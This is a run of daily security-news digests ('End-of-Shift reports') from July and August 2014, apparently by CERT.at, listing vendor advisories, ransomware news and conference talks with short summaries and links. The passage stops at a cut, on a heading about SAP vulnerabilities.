=======================
= End-of-Shift report =
=======================
Timeframe: Friday 08-08-2014 18:00 − Monday 11-08-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Cisco Unity Connection SQL Injection Vulnerability ***
---------------------------------------------
CVE-2014-3336
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Splunk Bugs Permit Remote Cross-Site Scripting and Remote Authenticated Directory Traversal Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1030690
*** Incident Response with Triage-ir, (Sun, Aug 10th) ***
---------------------------------------------
In many cases having a full disk image is not an option during an incident. Imagine that you suspect that you have dozens of infected or compromised systems. Can you spend 2-3 hours making a forensic copy of the hard disks of a hundred computers? In such a situation, fast forensics is the solution. Instead of copying everything, collecting some files that may contain evidence can solve this issue. In this diary I am going to talk about an application that will collect most of...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18509&rss
*** Verifying preferred SSL/TLS ciphers with Nmap, (Mon, Aug 11th) ***
---------------------------------------------
In the last year or two, there has been a lot of talk regarding correct usage of SSL/TLS ciphers on web servers. Due to various more or less known incidents, web sites today should use PFS (Perfect Forward Secrecy), a mechanism that is used when an SSL/TLS connection is established and symmetric keys exchanged. PFS ensures that, in case an attacker obtains the server's private key, he cannot decrypt previous SSL/TLS connections to that server. If PFS is not used (if RSA is used to
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18513&rss
*** WordHound generates tailored dictionaries for password crackers ***
---------------------------------------------
Dictionary attacks on password hashes take a long time and are not always successful. But if the passwords to be tried are tailored to the target, even comparatively complicated passwords may no longer be secure.
---------------------------------------------
http://www.heise.de/newsticker/meldung/WordHound-erzeugt-massgeschneiderte-…
*** You cannot cyberhijack an airplane, but you can create mischief ***
---------------------------------------------
Hacking a plane and taking control of the aircraft is a considerably scary prospect, but two speakers at DefCon 22 in Las Vegas quashed the notion and put worries to rest.
---------------------------------------------
http://www.scmagazine.com/defcon-you-cannot-cyberhijack-an-airplane-but-you…
*** Cybercrime report: social networks increasingly affected ***
---------------------------------------------
In 2013, 11,199 cases of cybercrime were reported in Austria. The Federal Criminal Police Office (Bundeskriminalamt) sees financial interests, boredom and hacktivism as the motives. [...] New technologies will continue to encourage new forms of cybercrime in the future, the report says. It mentions the use of "NFC" (Near Field Communication) for contactless payment transactions, but also means of transport that are being equipped with network communication capabilities, such as smart vehicles and drones, the report warns in conclusion.
---------------------------------------------
http://futurezone.at/netzpolitik/cybercrime-report-soziale-netzwerke-zunehm…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 07-08-2014 18:00 − Friday 08-08-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Massive data leak ***
---------------------------------------------
Massive data leak | 6 August 2014 | Various media report that a criminal group from Russia has captured a gigantic number of credentials. See, among others: New York Times, Slate, WSJ, DerStandard, Futurezone, Heise, ... | Where the credentials really come from (the story about the botnet and SQL injection sounds a bit like a report from 2013) is also not fully clarified: in other cases it was a mixture of various campaigns, both break-ins into...
---------------------------------------------
http://www.cert.at/services/blog/20140806143111-1213.html
*** Black Hat USA Talks: Investigating PowerShell Attacks ***
---------------------------------------------
Threat actors are always eager to adopt new tools, tactics, and procedures that can help them evade detection and conduct their mission. Incident responders from Mandiant have observed increasing use of PowerShell by targeted attackers to conduct command-and-control in compromised...
---------------------------------------------
http://www.fireeye.com/blog/technical/2014/08/black-hat-usa-talks-investiga…
*** IETF wants to standardise elliptic curves itself ***
---------------------------------------------
In the future, the IETF no longer wants to simply adopt the crypto standards recommended by NIST, but to create its own. NIST, meanwhile, continues to try to salvage its battered image as an independent authority.
---------------------------------------------
http://www.heise.de/security/meldung/IETF-will-selbst-elliptische-Kurven-st…
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server July 2014 CPU ***
---------------------------------------------
There are multiple vulnerabilities in IBM SDK Java Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed as part of the IBM Java SDK updates in July 2014. CVE(s): CVE-2014-4263 and CVE-2014-4244, Affected product(s) and affected version(s): IBM Java SDK shipped with IBM WebSphere Application Server Version 8.5.0.0 through 8.5.5.2, Version 8.0.0.0 through 8.0.0.9, Version 7.0.0.0 through 7.0.0.33, Version 6.1.0.0 through 6.1.0.47
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** Checking for vulnerabilities in the Smart Grid System, (Thu, Aug 7th) ***
---------------------------------------------
SCADA systems are not composed the same way as regular IT systems. Therefore, the risk and vulnerability assessment cannot be performed as it is done for any other IT system. The most important differences are: SCADA pentesting should not be done in a production environment: SCADA devices are very fragile, and some activities that would be harmless in regular IT environments could be catastrophic to the process availability. Think of massive blackouts or no water supply for a city. SCADA
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18499&rss
*** WordPress: defective plugin allows admin access ***
---------------------------------------------
The WordPress plugin Custom Contacts Form has a bug that allows attackers to obtain administrative rights over a website. A patch is already available.
---------------------------------------------
http://www.golem.de/news/wordpress-defektes-plugin-erlaubt-admin-zugriff-14…
*** Analyzing the Fake ID Android vulnerability ***
---------------------------------------------
In this video shot at Black Hat 2014 in Las Vegas, Jeff Forristal of Bluebox Security sits with Danielle Walker, reporter at SC Magazine, to discuss the Fake ID Android vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/Tp9gYIOHaFg/
*** Black Hat 2014: 75 percent of all mobile point-of-sale systems vulnerable ***
---------------------------------------------
Almost three quarters of all common mobile terminals for reading credit cards are based on the same hardware and software. Researchers have demonstrated how they can take control of the devices and thus open the door to card fraud.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Black-Hat-2014-75-Prozent-aller-mobi…
*** Patch day: Microsoft fixes critical vulnerabilities in Windows and IE ***
---------------------------------------------
On the coming patch day, Microsoft will release a total of nine security updates, two of which are marked as "critical" and seven more as "important".
---------------------------------------------
http://www.heise.de/newsticker/meldung/Patchday-Microsoft-behebt-kritische-…
*** Microsoft: no more updates for older Internet Explorer versions ***
---------------------------------------------
From the beginning of 2016, Microsoft will no longer support older Internet Explorer versions. Until then, Windows users should update their web browser in order to continue receiving updates.
---------------------------------------------
http://www.heise.de/security/meldung/Microsoft-Keine-Updates-mehr-fuer-aelt…
*** How to Use Your Cat to Hack Your Neighbor's Wi-Fi ***
---------------------------------------------
Late last month, a Siamese cat named Coco went wandering in his suburban Washington, DC neighborhood. He spent three hours exploring nearby backyards. He killed a mouse, whose carcass he thoughtfully brought home to his octogenarian owner, Nancy. And while he was out, Coco mapped dozens of his neighbors' Wi-Fi networks, identifying four routers that used...
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/3d4f7cee/sc/10/l/0L0Swired0N0C20A…
*** HPSBHF03084 rev.1 HP PCs with UEFI Firmware, Execution of Arbitrary Code ***
---------------------------------------------
Potential security vulnerabilities have been identified with certain HP PCs with UEFI Firmware. The vulnerabilities could be exploited to allow execution of arbitrary code.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HPSBUX03087 SSRT101413 rev.1 - HP-UX CIFS Server (Samba), Remote Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP-UX CIFS-Server (Samba). The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS).
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** New Sysinternals tool helps with malware hunting ***
---------------------------------------------
With the program Sysmon, Microsoft's popular Sysinternals tool collection has gained a new tool for detecting suspicious activity on Windows machines.
---------------------------------------------
http://www.heise.de/security/meldung/Neues-Sysinternals-Tool-hilft-bei-der-…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 06-08-2014 18:00 − Thursday 07-08-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Cisco IOS Software and Cisco IOS XE Software EnergyWise Crafted Packet Denial of Service Vulnerability ***
---------------------------------------------
cisco-sa-20140806-energywise
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Security expert calls home routers a clear and present danger ***
---------------------------------------------
In Black Hat Q&A, In-Q-Tel CISO says home routers are "critical infrastructure."
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/iXnyWy8k6JU/
*** Black Hat 2014: carrier software for remotely managing mobile devices allows abuse ***
---------------------------------------------
Two billion mobile devices run vulnerable software that network operators use to control the devices. With little effort, attackers can manipulate the devices remotely and unnoticed, for example to record data traffic.
---------------------------------------------
http://www.heise.de/security/meldung/Black-Hat-2014-Netzbetreiber-Software-…
*** Internet Explorer begins blocking out-of-date ActiveX controls ***
---------------------------------------------
As part of our ongoing commitment to delivering a more secure browser, starting August 12th Internet Explorer will block out-of-date ActiveX controls. ActiveX controls are small apps that let Web sites provide content, like videos and games, and let you interact with content like toolbars. Unfortunately, because many ActiveX controls aren't automatically updated, they can become outdated as new versions are released.
---------------------------------------------
http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-bloc…
*** Cisco 2014 Midyear Security Report: Exposing Weak Links to Strengthen the Security Chain ***
---------------------------------------------
You may be thinking, "What could have possibly changed since January?" True to form, the attacker community continues to evolve, innovate, and think up new ways to discover and exploit weak links in the security chain. Also true to form, they sometimes simply use tried and true methods to exploit some of the same old vulnerabilities that continue to present themselves.
---------------------------------------------
https://blogs.cisco.com/security/cisco-2014-midyear-security-report-exposin…
*** Securing VoIP systems ***
---------------------------------------------
Countermeasures for these security issues are given below in greater detail: - Encryption - Firewalls - Traffic Analysis - Improved network Security - Authentication mechanisms - Apply appropriate patches - Turn off unnecessary protocols...
---------------------------------------------
http://resources.infosecinstitute.com/securing-voip-systems/
*** Update now: older Synology NAS devices vulnerable to ransomware ***
---------------------------------------------
NAS manufacturer Synology has released details of the vulnerability that the SynoLocker ransomware exploits to encrypt its victims' data. According to the manufacturer, the security problem only affects older firmware versions and was fixed in December 2013. DiskStation Manager (DSM) version 4.3-3810 or older is said to be affected; an update to DSM 5.0 is said to fix it.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Jetzt-updaten-Aeltere-Synology-NAS-G…
*** OpenSSL updates - not quite as bad this time ***
---------------------------------------------
The OpenSSL developers fix nine security vulnerabilities, most of them discovered by Google researchers. This time, however, nothing really dramatic is among them.
---------------------------------------------
http://www.heise.de/newsticker/meldung/OpenSSL-Updates-diesmal-nicht-ganz-s…
*** Background: political solutions for a secure future of communication ***
---------------------------------------------
After the Snowden revelations, a discussion is due on what we can do better in the future to prevent espionage and large-scale mass surveillance. Besides better technology, new political approaches are also needed, says Linus Neumann.
---------------------------------------------
http://www.heise.de/security/artikel/Politische-Loesungen-fuer-eine-sichere…
*** Security Notice-Statement on 9 OpenSSL Vulnerabilities ***
---------------------------------------------
Aug 07, 2014 20:29
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 05-08-2014 18:00 − Wednesday 06-08-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Another Bypass Identified in PayPal 2FA ***
---------------------------------------------
A security researcher has uncovered a simple method for bypassing the two-factor authentication mechanism that PayPal uses to protect accounts that are tied to eBay accounts. The vulnerability is related to the way that the login flow works when a user is prompted to connect her eBay account to her PayPal account. The eBay and...
---------------------------------------------
http://threatpost.com/another-bypass-identified-in-paypal-2fa/107605
*** Mozilla to use central revocation lists in the future ***
---------------------------------------------
Secure Internet connections require mechanisms to declare compromised certificates invalid. The current procedures for this do not work, however. In the future, OneCRL is to take care of this in Firefox and co.
---------------------------------------------
http://www.heise.de/security/meldung/Mozilla-zukuenftig-mit-zentralen-Sperr…
*** Researchers release CryptoLocker decryption tool ***
---------------------------------------------
Tool uses private keys found in database of victims. The CryptoLocker ransomware is one of the nastiest pieces of malware to have targeted Internet users in recent years. The malware uses strong file encryption (more particularly, AES encryption with a key that has been encrypted using an RSA-2048 private key) to deny the user access to their files unless they pay a ransom of around US$300. At a time when we often seem to be learning about accidental or intentional vulnerabilities in encryption,...
---------------------------------------------
http://www.virusbtn.com/blog/2014/08_06.xml?rss
*** CipherShed ***
---------------------------------------------
CipherShed is free (as in free-of-charge and free-speech) encryption software for keeping your data secure and private. It started as a fork of the now-discontinued TrueCrypt Project.
---------------------------------------------
http://n0where.net/ciphershed/
*** Web-Fu - Chrome extension for pentesting web applications ***
---------------------------------------------
Chrome extension for pentesting web applications. Web-fu is a web hacking tool focused on discovering and exploiting web vulnerabilities.
---------------------------------------------
http://hack-tools.blackploit.com/2014/08/web-fu-chrome-extension-for-pentes…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 04-08-2014 18:00 − Tuesday 05-08-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Synology - first information regarding "Synolocker" ***
---------------------------------------------
Special Notes SynoLocker Message Issue - If NAS is not infected: First, close all open ports for external access for now. Backup the data on the DiskStation and update DSM to the latest version. Synology will provide further information as soon as possible if you are vulnerable. If NAS is infected, first do not trust (and ignore) any unauthorized, non-Synology messages or emails. Hard shut down the DiskStation to prevent any further issues.
---------------------------------------------
https://myds.synology.com/support/support_form.php?lang=us
*** Synolocker: Why OFFLINE Backups are important, (Tue, Aug 5th) ***
---------------------------------------------
One current threat causing a lot of sleepless nights to victims is "Cryptolocker"-like malware. Various variations of this type of malware are still haunting small businesses and home users by encrypting files and asking for ransom to obtain the decryption key. Your best defense against this type of malware is a good backup. Shadow volume copies may help, but aren't always available and complete. In particular for small businesses, various simple NAS systems have become popular over
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18481&rss
*** Ubuntu lock screen leaks keyboard input ***
---------------------------------------------
A now-closed security vulnerability in the lock screen of the Linux distribution Ubuntu could result in users accidentally publishing their password on the Internet.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Ubuntu-Sperrbildschirm-verliert-Tast…
*** Barracuda Web Application Firewall Reusable URL-Based Authentication Tokens Let Remote Users Bypass Authentication ***
---------------------------------------------
http://www.securitytracker.com/id/1030665
*** Evernote Patches Vulnerability in Android App ***
---------------------------------------------
We have previously discussed an Android vulnerability that may lead to user data being captured or used to launch attacks. We discovered that the popular Android app for Evernote contained the said vulnerability. We disclosed the details to Evernote, and they took action by issuing an update to the Android version of their app. Evernote has added additional...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/BBLQmuk3RrQ/
*** Symantec Endpoint Protection Local Client Application Device Control Buffer Overflow ***
---------------------------------------------
Revisions: None. Severity (CVSS2 Base Score / Impact / Exploitability / CVSS2 Vector): SEP Local Client ADC Buffer Overflow - Medium, 6....
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Bugtraq: SEC Consult SA-20140805-0 :: Multiple vulnerabilities in Readsoft Invoice Processing and Process Director ***
---------------------------------------------
http://www.securityfocus.com/archive/1/533024
*** A Peek Into the Lions Den - The Magnitude [aka PopAds] Exploit Kit ***
---------------------------------------------
Recently we managed to have an unusual peek into the content that is used on the servers of the prevalent exploit kit, Magnitude. In this blog post we'll review its most up-to-date administration panel and capabilities, as well as review some infection statistics provided by Magnitude over the course of several weeks. These days, after the arrest of Paunch, Blackhole exploit kit creator, exploit kit developers and sellers have learned their lesson regarding doing business in the
---------------------------------------------
http://blog.spiderlabs.com/2014/08/a-peek-into-the-lions-den-the-magnitude-…
*** Vulnerability in Spotify Android App May Lead to Phishing ***
---------------------------------------------
We have discovered a vulnerability that affects versions of the Spotify app for Android older than 1.1.1. If exploited, the vulnerability can allow bad guys to control what is being displayed on the app interface. This vulnerability can be potentially abused by cybercriminals to launch phishing attacks that may result in information loss or theft.
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/GZKakDZwRhw/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 01-08-2014 18:00 − Monday 04-08-2014 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** ZDI-14-273: AlienVault OSSIM av-centerd Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault OSSIM. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-14-273/
*** Remote code execution on Android devices ***
---------------------------------------------
You walk into a coffee shop and take a seat. While waiting for your coffee, you take out your smartphone and start playing a game you downloaded the other day. Later, you go to work and check your email in the elevator. Without you knowing, an attacker has just gained a foothold in your corporate...
---------------------------------------------
http://labs.bromium.com/2014/07/31/remote-code-execution-on-android-devices/
*** POWELIKS: Malware Hides In Windows Registry ***
---------------------------------------------
We spotted a malware that hides all its malicious codes in the Windows Registry. The said tactic provides evasion and stealth mechanisms to the malware, which Trend Micro detects as TROJ_POWELIKS.A. When executed, TROJ_POWELIKS.A downloads files, which can cause further system infection. Systems affected by this malware risk being infected by other malware, thus causing further...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/OEAKGdXwSnc/
*** All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon, (Sat, Aug 2nd) ***
---------------------------------------------
A remote code execution in nmbd (the NetBIOS name services daemon) has been found in Samba versions 4.0.0 to 4.1.10 (assigned CVE-2014-3560) and a patch has been released by the team at samba.org. Here are the details from http://www.samba.org/samba/security/CVE-2014-3560 =========== Description =========== All current versions of Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon. A malicious browser can send packets that may overwrite
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18471&rss
*** TP-Link TL-WR740N v4 arbitrary shell command execution ***
---------------------------------------------
Topic: TP-Link TL-WR740N v4 arbitrary shell command execution Risk: High Text:# Exploit Title: TP-Link TL-WR740N v4 router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) arbitrary shell command execution # Dat...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014080013
*** Encryption trojan attacks Synology storage systems ***
---------------------------------------------
Cyber extortionists have found a new, direct way to take their victims' digital belongings hostage: they exploit a security vulnerability in the NAS firmware to encrypt the entire network storage.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Verschluesselungstrojaner-attackiert…
*** China boots Kaspersky and Symantec off security contractor list ***
---------------------------------------------
Foreign firms dropped from roll of approved infosec vendors. Kaspersky Labs and Symantec have both been booted off China's list of approved security vendors for government agencies, as the country continues to tighten up against foreign tech firms in the wake of the NSA indiscriminate surveillance revelations.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/08/04/kaspersky_s…
*** Bugtraq: ownCloud Unencrypted Private Key Exposure ***
---------------------------------------------
http://www.securityfocus.com/archive/1/533010
*** Backdoor Techniques in Targeted Attacks ***
---------------------------------------------
Backdoors are an essential part of targeted attacks, as they allow an external threat actor to exercise control over any compromised machines. These allow the threat actor to collect information and move laterally within the targeted organization. Our investigations into various targeted attacks have showed that a wide variety of tactics are used by backdoors to carry out...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/fHW4IPov8YE/
*** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM WebSphere Real Time ***
---------------------------------------------
Java SE issues disclosed in the Oracle July 2014 Critical Patch Update, plus 1 additional vulnerability CVE(s): CVE-2014-3086, CVE-2014-4227, CVE-2014-4262, CVE-2014-4219, CVE-2014-4209, CVE-2014-4220, CVE-2014-4268, CVE-2014-4218, CVE-2014-4252, CVE-2014-4266, CVE-2014-4265, CVE-2014-4221, CVE-2014-4263, CVE-2014-4244 and CVE-2014-4208 Affected product(s) and affected version(s): IBM WebSphere Real Time Version 3 Service Refresh 7 and earlier Refer to the following reference URLs for
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** IBM Security Bulletin: Security vulnerabilities in Apache Tomcat in Rational DOORS Web Access ***
---------------------------------------------
The Apache Tomcat application server in installations of IBM Rational DOORS Web Access version contains security vulnerabilities. CVE(s): CVE-2013-4322, CVE-2013-4590, CVE-2014-0096, CVE-2014-0099 and CVE-2014-0119 Affected product(s) and affected version(s): Rational DOORS Web Access version 9.6.0.x, 9.5.2.x, 9.5.1.x, 9.5.0.x, 1.5.0.x, 1.4.0.4 Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin:
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 31-07-2014 18:00 − Friday 01-08-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Russian ransomware author takes the easy route ***
---------------------------------------------
Symantec Security Response has observed a new variant of ransomcrypt malware which is easy to update and uses open source components to encrypt files. The variant, detected as Trojan.Ransomcrypt.L, uses a legitimate open source implementation of the OpenPGP standard to encrypt files on the victim’s computer. The threat then displays a ransom notice in Russian, asking the user to pay in order to unlock the files.
---------------------------------------------
http://www.symantec.com/connect/blogs/russian-ransomware-author-takes-easy-…
*** Announcing EMET 5.0 ***
---------------------------------------------
Today, we are excited to announce the general availability of the Enhanced Mitigation Experience Toolkit (EMET) 5.0. As many of you already know, EMET is a free tool, designed to help customers with their defense in depth strategies against cyberattacks, by helping detect and block exploitation techniques ..
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2014/07/31/announcing-emet-v5.aspx
*** Backoff - Technical Analysis ***
---------------------------------------------
As discussed in the advisory published by US-CERT, Trustwave SpiderLabs has discovered a previously unidentified family of Point of Sale (PoS) malware. This blog post serves as a technical analysis of the Backoff malware family. While a number ..
---------------------------------------------
http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html
*** BadUSB: when USB devices turn evil ***
---------------------------------------------
Whoever controls the firmware of a USB stick can turn it into a perfect trojan. German researchers show that this is possible entirely via software and that it opens up completely new infection scenarios.
---------------------------------------------
http://www.heise.de/security/meldung/BadUSB-Wenn-USB-Geraete-boese-werden-2…
*** Backups - The Forgotten Website Security Pillar ***
---------------------------------------------
I travel a lot (a lot might actually be an understatement these days), but the travel always revolves around a couple common threads - namely website security education and awareness. In these travels, regardless of the community I am engaging with, there are always common questions ..
---------------------------------------------
http://blog.sucuri.net/2014/07/backups-the-forgotten-website-security-pilla…
*** The Severe Flaw Found in Certain File Locker Apps ***
---------------------------------------------
Protecting data has always been one of the most important aspects of our digital life. Given the amount of activity done on smartphones, this rings especially true for smartphones. While users may use the built-in privacy and security settings of their devices, others take it a step further and employ security ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/the-severe-flaw-…
*** MediaWiki Input Validation Flaws Permit Cross-Site Scripting and Clickjacking Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1030660
*** Offensive Security reports of Symantec Endpoint Protection zero-day vulnerability (July 2014) ***
---------------------------------------------
This Knowledge Base article will be updated as further information becomes available. Please subscribe to this document to receive update notifications automatically. To mitigate this issue while research is underway and solutions are being identified, uninstall or disable the sysplant driver.
---------------------------------------------
http://www.symantec.com/business/support/index?page=content&id=TECH223338
*** Backdoor.Gates: Also Works for Windows ***
---------------------------------------------
We have received reports about a Linux malware known as Backdoor.Gates. Analysis showed that this malware has the following features ..
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002728.html
*** SubSTATION Server Telegyr 8979 Master Vulnerabilities ***
---------------------------------------------
This advisory provides mitigation details for a Buffer Overflow Vulnerability in the SUBNET Solutions Inc (SUBNET), SubSTATION Server 2, Telegyr 8979 Master ..
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-196-01
*** Yes, Hackers Could Build an iPhone Botnet - Thanks to Windows ***
---------------------------------------------
A reminder to Apple and smug iPhone owners: Just because iOS has never been the victim of a widespread malware outbreak doesn't mean mass iPhone hacking isn't still possible. Now one group of security researchers plans ..
---------------------------------------------
http://www.wired.com/2014/08/yes-hackers-could-build-an-iphone-botnetthanks…
*** Citadel Malware Variant Allows Attackers Remote Access, Even After Removal ***
---------------------------------------------
A new variant of the Citadel banking Trojan has been discovered where the attackers are using Windows remote shell commands to enable Remote Desktop Protocol access, even if the malware is discovered and removed.
---------------------------------------------
http://threatpost.com/citadel-malware-variant-allows-attackers-remote-acces…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 30-07-2014 18:00 − Thursday 31-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Innominate mGuard Unauthorized Leakage of System Data ***
---------------------------------------------
Exploitation of this vulnerability could allow a remote unauthenticated user access to release configuration information. While this is a minor vulnerability, it represents a method for further network reconnaissance.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-189-02
*** How safe is your quantified self? Tracking, monitoring, and wearable tech ***
---------------------------------------------
Self-tracking enthusiasts are generating a torrent of personal information through apps and devices. Is this data safe from prying eyes?
---------------------------------------------
http://www.symantec.com/connect/blogs/how-safe-your-quantified-self-trackin…
*** Why the Security of USB Is Fundamentally Broken ***
---------------------------------------------
Computer users pass around USB sticks like silicon business cards. Although we know they often carry malware infections, we depend on antivirus scans and the occasional reformatting to keep our thumbdrives from becoming the carrier for the ..
---------------------------------------------
http://www.wired.com/2014/07/usb-security/
*** TA14-212A: Backoff Point-of-Sale Malware ***
---------------------------------------------
“Backoff” is a family of PoS malware and has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary variants to the “Backoff” malware including ..
---------------------------------------------
https://www.us-cert.gov/ncas/alerts/TA14-212A
*** Takedowns: Touchdown or Turnover? ***
---------------------------------------------
Over the last several months malware takedowns have made headlines. But what is really involved in such an operation? The recent takedowns have been a collaborative effort mostly between the private sector and government entities, with academic researchers also playing a role. While some operations included arrests, and others included a civil lawsuit, ..
---------------------------------------------
http://www.seculert.com/blog/2014/07/takedowns-touchdown-or-turnover.html
*** 3 security mistakes small companies make and how to avoid them ***
---------------------------------------------
Dedicated IT staff are a luxury most very small businesses do without, but those organisations still need to find a way to secure their computers against cyber criminals who aren't looking to cut them a break just because they're small.
---------------------------------------------
http://nakedsecurity.sophos.com/2014/07/31/3-security-mistakes-small-compan…
*** How to Hunt Down Phishing Kits ***
---------------------------------------------
Sites like phishtank and clean-mx act as crowdsourced phishing detection and validation. By knowing how to look, you can consistently find interesting information about how attackers work, and the tools they use to conduct phishing campaigns. This post will give an example of how phishing kits are used, how to find them, as well as show a case study into other ..
---------------------------------------------
https://jordan-wright.github.io/blog/2014/07/30/how-to-hunt-down-phishing-k…
*** Spy of the Tiger ***
---------------------------------------------
A recent report documents a group of attackers known as 'PittyTiger' that appears to have been active since at least 2011; however, they may have been operating as far back as 2008. We have been monitoring the activities of this ..
---------------------------------------------
http://www.fireeye.com/blog/technical/threat-intelligence/2014/07/spy-of-th…
*** Attack on video game makers: hackers are after source code ***
---------------------------------------------
The hackers of "Threat Group 3279" have been active for years and are trying to steal the source code of games and to crack the security measures of the associated DRM systems. The group is said to originate from China.
---------------------------------------------
http://www.heise.de/security/meldung/Angriff-auf-Videospiele-Hersteller-Hac…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 29-07-2014 18:00 − Wednesday 30-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** 22 Jump Street, Transformers Are Top Movie Lures for Summer ***
---------------------------------------------
Summertime has become synonymous with blockbuster movies. Unfortunately, these movies have become a go-to social engineering lure used by cybercriminals. Just like in previous years, Trend Micro engineers searched for possible threats related to movies released during the summer. This year, 22 Jump Street was the top movie used for social ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/22-jump-street-t…
*** Google Android Certificate Chain Validation Flaw Lets Applications Gain Elevated Privileges ***
---------------------------------------------
The software does not properly validate an application's certificate chain. An application can supply a specially crafted application identity certificate to impersonate a privileged application and gain access to vendor-specific device administration extensions.
---------------------------------------------
http://www.securitytracker.com/id/1030654
*** Extortion Trojan CTB-Locker encrypts securely and covers its tracks ***
---------------------------------------------
Anyone who falls victim to this malware has little hope for their data. The data is locked with state-of-the-art encryption, and the Trojan communicates with its control servers only in encrypted form over the Tor network.
---------------------------------------------
http://www.heise.de/security/meldung/Erpressungs-Trojaner-CTB-Locker-versch…
*** Symantec Endpoint Protection 0day ***
---------------------------------------------
In a recent engagement, we had the opportunity to audit the Symantec Antivirus Endpoint Protection solution, where we found a multitude of vulnerabilities. Some of these made it to CERT, while others have been scheduled for review during our upcoming AWE course at Black Hat 2014, Las Vegas. Ironically, the same software that was meant to protect the organization under review was the reason for its compromise.
---------------------------------------------
http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/
*** Scan Shows Possible Heartbleed Fix Failures ***
---------------------------------------------
Of more than 1,600 Global 2000 firms, only 3% of their public-facing servers have been fully and properly locked down from the Heartbleed vulnerability that was first revealed ..
---------------------------------------------
http://www.darkreading.com/vulnerabilities---threats/vulnerability-manageme…
*** Tor security advisory: "relay early" traffic confirmation attack ***
---------------------------------------------
On July 4 2014 we found a group of relays that we assume were trying to deanonymize users. They appear to have been targeting people who operate or access Tor hidden services. The attack involved modifying Tor protocol headers to do traffic confirmation attacks.
---------------------------------------------
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-…
*** Internet of Things: credit card numbers and the password 1234 ***
---------------------------------------------
Manufacturers of networked devices are careless about their security. Broken web interfaces, unnecessary credit card information and overly simple passwords such as 1234 make many devices vulnerable.
---------------------------------------------
http://www.golem.de/news/internet-of-things-kreditkartennummern-und-das-pas…
*** Multiple vulnerabilities in Kunena Forum Extension for Joomla ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532933
http://www.securityfocus.com/archive/1/532932
*** Multiple vulnerabilities in SAP products ***
---------------------------------------------
